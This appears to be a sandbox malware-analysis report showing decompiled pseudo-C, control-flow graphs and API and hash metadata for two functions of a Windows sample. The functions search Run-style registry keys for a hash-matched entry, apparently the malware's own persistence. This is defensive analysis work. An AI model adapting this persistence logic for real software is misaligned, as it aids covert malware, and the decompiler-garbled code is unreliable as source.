                                                                                control_flow_graph 264 4073ff-407419 265 40741b 264->265 266 40741d-407422 264->266 265->266 267 407424 266->267 268 407426-40742b 266->268 267->268 269 407430-407435 268->269 270 40742d 268->270 271 407437 269->271 272 40743a-407481 call 406dc2 call 402544 RegOpenKeyExA 269->272 270->269 271->272 277 407487-40749d call 40ee2a 272->277 278 4077f9-4077fe call 40ee2a 272->278 284 407703-40770e RegEnumKeyA 277->284 283 407801 278->283 287 407804-407808 283->287 285 4074a2-4074b1 call 406cad 284->285 286 407714-40771d RegCloseKey 284->286 290 4074b7-4074cc call 40f1a5 285->290 291 4076ed-407700 285->291 286->283 290->291 294 4074d2-4074f8 RegOpenKeyExA 290->294 291->284 295 407727-40772a 294->295 296 4074fe-407530 call 402544 RegQueryValueExA 294->296 297 407755-407764 call 40ee2a 295->297 298 40772c-407740 call 40ef00 295->298 296->295 304 407536-40753c 296->304 309 4076df-4076e2 297->309 306 407742-407745 RegCloseKey 298->306 307 40774b-40774e 298->307 308 40753f-407544 304->308 306->307 312 4077ec-4077f7 RegCloseKey 307->312 308->308 311 407546-40754b 308->311 309->291 310 4076e4-4076e7 RegCloseKey 309->310 310->291 311->297 313 407551-40756b call 40ee95 311->313 312->287 313->297 316 407571-407593 call 402544 call 40ee95 313->316 321 407753 316->321 322 407599-4075a0 316->322 321->297 323 4075a2-4075c6 call 40ef00 call 40ed03 322->323 324 4075c8-4075d7 call 40ed03 322->324 330 4075d8-4075da 323->330 324->330 332 4075dc 330->332 333 4075df-407623 call 40ee95 call 402544 call 40ee95 call 40ee2a 330->333 332->333 342 407626-40762b 333->342 342->342 343 40762d-407634 342->343 344 407637-40763c 343->344 344->344 345 40763e-407642 344->345 346 407644-407656 call 40ed77 345->346 347 40765c-407673 call 40ed23 345->347 346->347 354 407769-40777c call 40ef00 346->354 352 407680 347->352 353 407675-40767e 347->353 356 407683-40768e call 406cad 352->356 353->356 359 4077e3-4077e6 RegCloseKey 354->359 361 407722-407725 356->361 362 407694-4076bf call 40f1a5 call 406c96 356->362 359->312 363 4076dd 361->363 368 4076c1-4076c7 362->368 369 4076d8 362->369 363->309 368->369 370 4076c9-4076d2 368->370 369->363 370->369 371 40777e-407797 GetFileAttributesExA 370->371 372 407799 371->372 373 40779a-40779f 371->373 372->373 374 4077a1 373->374 375 4077a3-4077a8 373->375 374->375 376 4077c4-4077c8 375->376 377 4077aa-4077c0 call 40ee08 375->377 379 4077d7-4077dc 376->379 380 4077ca-4077d6 call 40ef00 376->380 377->376 383 4077e0-4077e2 379->383 384 4077de 379->384 380->379 383->359 384->383
                                                                                C-Code - Quality: 76%
                                                                                			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
				}
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x61616161) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12);
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16);
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295);
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x61616161;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12);
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20); // executed
					L66:
					return _t93 | 0xffffffff;
				}
			}























































                                                                                0x004073ff
                                                                                0x00407408
                                                                                0x0040740e
                                                                                0x00407410
                                                                                0x00407419
                                                                                0x0040741b
                                                                                0x0040741b
                                                                                0x0040741d
                                                                                0x00407422
                                                                                0x00407424
                                                                                0x00407424
                                                                                0x00407426
                                                                                0x0040742b
                                                                                0x0040742d
                                                                                0x0040742d
                                                                                0x00407430
                                                                                0x00407435
                                                                                0x00407437
                                                                                0x00407437
                                                                                0x0040743a
                                                                                0x0040743f
                                                                                0x00407451
                                                                                0x00407464
                                                                                0x00407469
                                                                                0x00407472
                                                                                0x00407478
                                                                                0x0040747d
                                                                                0x0040747e
                                                                                0x00407481
                                                                                0x004077f9
                                                                                0x00000000
                                                                                0x00407487
                                                                                0x00407487
                                                                                0x0040748c
                                                                                0x0040748f
                                                                                0x00407498
                                                                                0x00407499
                                                                                0x0040749c
                                                                                0x00407703
                                                                                0x00407706
                                                                                0x0040770e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004074b1
                                                                                0x004076ed
                                                                                0x004076ed
                                                                                0x004076f5
                                                                                0x004076f6
                                                                                0x004076ff
                                                                                0x00407700
                                                                                0x00000000
                                                                                0x00407700
                                                                                0x004074be
                                                                                0x004074c8
                                                                                0x004074cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004074e6
                                                                                0x004074e9
                                                                                0x004074f0
                                                                                0x004074f8
                                                                                0x00407727
                                                                                0x0040772a
                                                                                0x00407755
                                                                                0x0040775c
                                                                                0x00407761
                                                                                0x004076df
                                                                                0x004076e2
                                                                                0x004076e7
                                                                                0x004076e7
                                                                                0x00000000
                                                                                0x004076e2
                                                                                0x00407736
                                                                                0x00407740
                                                                                0x00407745
                                                                                0x00407745
                                                                                0x0040774b
                                                                                0x0040774d
                                                                                0x004077ec
                                                                                0x004077ef
                                                                                0x00000000
                                                                                0x004077f5
                                                                                0x0040751c
                                                                                0x00407521
                                                                                0x00407528
                                                                                0x00407530
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407536
                                                                                0x0040753c
                                                                                0x0040753f
                                                                                0x0040753f
                                                                                0x00407541
                                                                                0x00407542
                                                                                0x0040754b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040755f
                                                                                0x00407565
                                                                                0x00407566
                                                                                0x0040756b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407589
                                                                                0x0040758e
                                                                                0x00407593
                                                                                0x00407753
                                                                                0x00000000
                                                                                0x00407753
                                                                                0x004075a0
                                                                                0x004075d1
                                                                                0x004075d7
                                                                                0x004075a2
                                                                                0x004075b0
                                                                                0x004075be
                                                                                0x004075c3
                                                                                0x004075c3
                                                                                0x004075da
                                                                                0x004075dc
                                                                                0x004075dc
                                                                                0x004075fc
                                                                                0x00407615
                                                                                0x00407618
                                                                                0x0040761d
                                                                                0x00407620
                                                                                0x00407623
                                                                                0x00407626
                                                                                0x00407626
                                                                                0x00407628
                                                                                0x00407629
                                                                                0x0040762d
                                                                                0x00407632
                                                                                0x00407634
                                                                                0x00407634
                                                                                0x00407637
                                                                                0x00407637
                                                                                0x00407639
                                                                                0x0040763a
                                                                                0x0040763e
                                                                                0x00407642
                                                                                0x0040765c
                                                                                0x00407664
                                                                                0x00407667
                                                                                0x0040766e
                                                                                0x00407673
                                                                                0x00407680
                                                                                0x00407675
                                                                                0x0040767b
                                                                                0x0040767b
                                                                                0x0040768e
                                                                                0x00407722
                                                                                0x00000000
                                                                                0x00407694
                                                                                0x004076a1
                                                                                0x004076ad
                                                                                0x004076b3
                                                                                0x004076bf
                                                                                0x004076d8
                                                                                0x004076d8
                                                                                0x004076dd
                                                                                0x004076dd
                                                                                0x00000000
                                                                                0x004076dd
                                                                                0x004076c1
                                                                                0x004076c7
                                                                                0x00000000
                                                                                0x0040777e
                                                                                0x00407785
                                                                                0x00407797
                                                                                0x00407799
                                                                                0x00407799
                                                                                0x0040779a
                                                                                0x0040779f
                                                                                0x004077a1
                                                                                0x004077a1
                                                                                0x004077a3
                                                                                0x004077a8
                                                                                0x004077b3
                                                                                0x004077b8
                                                                                0x004077c0
                                                                                0x004077c0
                                                                                0x004077c8
                                                                                0x004077d0
                                                                                0x004077d6
                                                                                0x004077d7
                                                                                0x004077dc
                                                                                0x004077de
                                                                                0x004077de
                                                                                0x004077e0
                                                                                0x004077e2
                                                                                0x00000000
                                                                                0x004077e2
                                                                                0x004076c7
                                                                                0x00407769
                                                                                0x00407773
                                                                                0x004077e3
                                                                                0x004077e6
                                                                                0x00000000
                                                                                0x004077e6
                                                                                0x00407642
                                                                                0x00407717
                                                                                0x00407801
                                                                                0x00000000
                                                                                0x00407801

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,74CB43E0,00000000), ref: 00407472
                                                                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 004074F0
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407528
                                                                                • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 004076E7
                                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407717
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407745
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 004077EF
                                                                                  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004077E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "$PromptOnSecureDesktop
                                                                                • API String ID: 3433985886-3108538426
                                                                                • Opcode ID: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
                                                                                • Instruction ID: 7fe5a339a68ccf6b09c70fd716338511db9c3a0a85de510e5ec7ef93542d7acc
                                                                                • Opcode Fuzzy Hash: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
                                                                                • Instruction Fuzzy Hash: 10C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1044B7F504B72D1EA78AE908B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040704C Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 332registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 386 40704c-407071 387 407073 386->387 388 407075-40707a 386->388 387->388 389 40707c 388->389 390 40707e-407083 388->390 389->390 391 407085 390->391 392 407087-40708c 390->392 391->392 393 407090-4070ca call 402544 RegOpenKeyExA 392->393 394 40708e 392->394 397 4070d0-4070f6 call 406dc2 393->397 398 4071b8-4071c8 call 40ee2a 393->398 394->393 404 40719b-4071a9 RegEnumValueA 397->404 403 4071cb-4071cf 398->403 405 4070fb-4070fd 404->405 406 4071af-4071b2 RegCloseKey 404->406 407 40716e-407194 405->407 408 4070ff-407102 405->408 406->398 407->404 408->407 409 407104-407107 408->409 409->407 410 407109-40710d 409->410 410->407 411 40710f-407133 call 402544 call 40eed1 410->411 416 4071d0-407203 call 402544 call 40ee95 call 40ee2a 411->416 417 407139-407145 call 406cad 411->417 432 407205-407212 RegCloseKey 416->432 433 407227-40722e 416->433 423 407147-40715c call 40f1a5 417->423 424 40715e-40716b call 40ee2a 417->424 423->416 423->424 424->407 436 407222-407225 432->436 437 407214-407221 call 40ef00 432->437 434 407230-407256 call 40ef00 call 40ed23 433->434 435 40725b-40728c call 402544 call 40ee95 call 40ee2a 433->435 434->435 448 407258 434->448 451 4072b8-4072cb call 40ed77 435->451 452 40728e-40729a RegCloseKey 435->452 436->403 437->436 448->435 459 4072dd-4072f4 call 40ed23 451->459 460 4072cd-4072d8 RegCloseKey 451->460 453 4072aa-4072b3 452->453 454 40729c-4072a9 call 40ef00 452->454 453->403 454->453 463 407301 459->463 464 4072f6-4072ff 459->464 460->403 465 407304-40730f call 406cad 463->465 464->465 468 407311-40731d RegCloseKey 465->468 469 407335-40735d call 406c96 465->469 470 40732d-407330 468->470 471 40731f-40732c call 40ef00 468->471 476 4073d5-4073e2 RegCloseKey 469->476 477 40735f-407365 469->477 470->453 471->470 479 4073f2-4073f7 476->479 480 4073e4-4073f1 call 40ef00 476->480 477->476 478 407367-407370 477->478 478->476 481 407372-40737c 478->481 480->479 483 40739d-4073a2 481->483 484 40737e-407395 GetFileAttributesExA 481->484 486 4073a4 483->486 487 4073a6-4073a9 483->487 484->483 488 407397 484->488 486->487 489 4073b9-4073bc 487->489 490 4073ab-4073b8 call 40ef00 487->490 488->483 492 4073cb-4073cd 489->492 493 4073be-4073ca call 40ef00 489->493 490->489 492->476 493->492
                                                                                C-Code - Quality: 68%
                                                                                			E0040704C(intOrPtr _a4, int _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				long _t94;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				int _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				void* _t166;
				int _t196;
				int _t202;
				void* _t203;
				void* _t204;
				void* _t206;
				void* _t207;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t94 = RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12); // executed
				if(_t94 != 0) {
					L21:
					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00406DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??); // executed
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
						_t206 = _t204 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t207 = _t206 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0040EF00( &_v364,  &_v363);
									_t149 = E0040ED23( &_v364, 0x22);
									_t207 = _t207 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0040ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0040ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00406CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											asm("popad");
											asm("popad");
											asm("popad");
											asm("popad");
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = 0x4122f8;
											_t166 = 0xad;
											_t123 = E00406C96(0x4122f8);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0040EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											__eflags = 0x6d - 0x3f;
											if(0x6d > 0x3f) {
												goto L57;
											}
											__eflags = 0xf8 - 0x10;
											if(0xf8 >= 0x10) {
												goto L57;
											}
											_t202 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t202;
											if(_t202 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t202 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t204 = _t206 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x61616161;
						__eflags = _t158 - (_v32 ^ 0x61616161);
						if(_t158 == (_v32 ^ 0x61616161)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12); // executed
					goto L21;
				}
			}










































                                                                                0x00407055
                                                                                0x00407058
                                                                                0x0040705a
                                                                                0x00407061
                                                                                0x00407068
                                                                                0x00407071
                                                                                0x00407073
                                                                                0x00407073
                                                                                0x00407075
                                                                                0x0040707a
                                                                                0x0040707c
                                                                                0x0040707c
                                                                                0x0040707e
                                                                                0x00407083
                                                                                0x00407085
                                                                                0x00407085
                                                                                0x00407087
                                                                                0x0040708c
                                                                                0x0040708e
                                                                                0x0040708e
                                                                                0x004070b4
                                                                                0x004070b9
                                                                                0x004070c2
                                                                                0x004070ca
                                                                                0x004071b8
                                                                                0x004071c8
                                                                                0x00000000
                                                                                0x004070d0
                                                                                0x004070d0
                                                                                0x004070d8
                                                                                0x004070df
                                                                                0x004070e3
                                                                                0x004070e4
                                                                                0x004070e9
                                                                                0x004070ed
                                                                                0x004070ee
                                                                                0x004070f1
                                                                                0x004070f2
                                                                                0x004070f5
                                                                                0x0040719b
                                                                                0x0040719e
                                                                                0x004071a9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004070fb
                                                                                0x004070fd
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x00407174
                                                                                0x0040717b
                                                                                0x0040717f
                                                                                0x00407180
                                                                                0x00407185
                                                                                0x00407189
                                                                                0x0040718a
                                                                                0x0040718d
                                                                                0x00407194
                                                                                0x00000000
                                                                                0x00407194
                                                                                0x004070ff
                                                                                0x00407102
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407104
                                                                                0x00407107
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407109
                                                                                0x0040710d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407123
                                                                                0x00407128
                                                                                0x0040712d
                                                                                0x0040712f
                                                                                0x0040712f
                                                                                0x00407130
                                                                                0x00407133
                                                                                0x004071d0
                                                                                0x004071f4
                                                                                0x004071f7
                                                                                0x004071fc
                                                                                0x004071ff
                                                                                0x00407203
                                                                                0x00407227
                                                                                0x0040722e
                                                                                0x0040723e
                                                                                0x0040724c
                                                                                0x00407251
                                                                                0x00407254
                                                                                0x00407256
                                                                                0x00407258
                                                                                0x00407258
                                                                                0x00407256
                                                                                0x00407280
                                                                                0x00407282
                                                                                0x0040728a
                                                                                0x0040728c
                                                                                0x004072c2
                                                                                0x004072c9
                                                                                0x004072cb
                                                                                0x004072e6
                                                                                0x004072e8
                                                                                0x004072ef
                                                                                0x004072f2
                                                                                0x004072f4
                                                                                0x00407301
                                                                                0x00407301
                                                                                0x00407301
                                                                                0x004072f6
                                                                                0x004072fc
                                                                                0x004072fc
                                                                                0x00407307
                                                                                0x0040730d
                                                                                0x0040730f
                                                                                0x00407335
                                                                                0x00407336
                                                                                0x00407337
                                                                                0x00407338
                                                                                0x00407339
                                                                                0x0040733e
                                                                                0x0040734b
                                                                                0x0040734e
                                                                                0x00407354
                                                                                0x0040735b
                                                                                0x0040735d
                                                                                0x004073d5
                                                                                0x004073d8
                                                                                0x004073de
                                                                                0x004073e2
                                                                                0x004073eb
                                                                                0x004073f1
                                                                                0x004073f2
                                                                                0x004073f4
                                                                                0x004073f7
                                                                                0x00000000
                                                                                0x004073f7
                                                                                0x00407362
                                                                                0x00407365
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040736d
                                                                                0x00407370
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407372
                                                                                0x00407375
                                                                                0x0040737a
                                                                                0x0040737c
                                                                                0x0040738d
                                                                                0x00407393
                                                                                0x00407395
                                                                                0x00407397
                                                                                0x00407397
                                                                                0x00407395
                                                                                0x0040739d
                                                                                0x004073a0
                                                                                0x004073a2
                                                                                0x004073a4
                                                                                0x004073a4
                                                                                0x004073a6
                                                                                0x004073a9
                                                                                0x004073b2
                                                                                0x004073b8
                                                                                0x004073b9
                                                                                0x004073bc
                                                                                0x004073c4
                                                                                0x004073ca
                                                                                0x004073cb
                                                                                0x004073cd
                                                                                0x00000000
                                                                                0x00407311
                                                                                0x00407314
                                                                                0x0040731a
                                                                                0x0040731d
                                                                                0x00407326
                                                                                0x0040732c
                                                                                0x0040732d
                                                                                0x00000000
                                                                                0x0040732d
                                                                                0x0040730f
                                                                                0x004072d0
                                                                                0x004072d6
                                                                                0x00000000
                                                                                0x0040728e
                                                                                0x00407291
                                                                                0x00407297
                                                                                0x0040729a
                                                                                0x004072a3
                                                                                0x004072a9
                                                                                0x004072aa
                                                                                0x004072aa
                                                                                0x004072ac
                                                                                0x004072af
                                                                                0x004072b2
                                                                                0x004071cb
                                                                                0x004071cf
                                                                                0x004071cf
                                                                                0x0040728c
                                                                                0x00407208
                                                                                0x0040720e
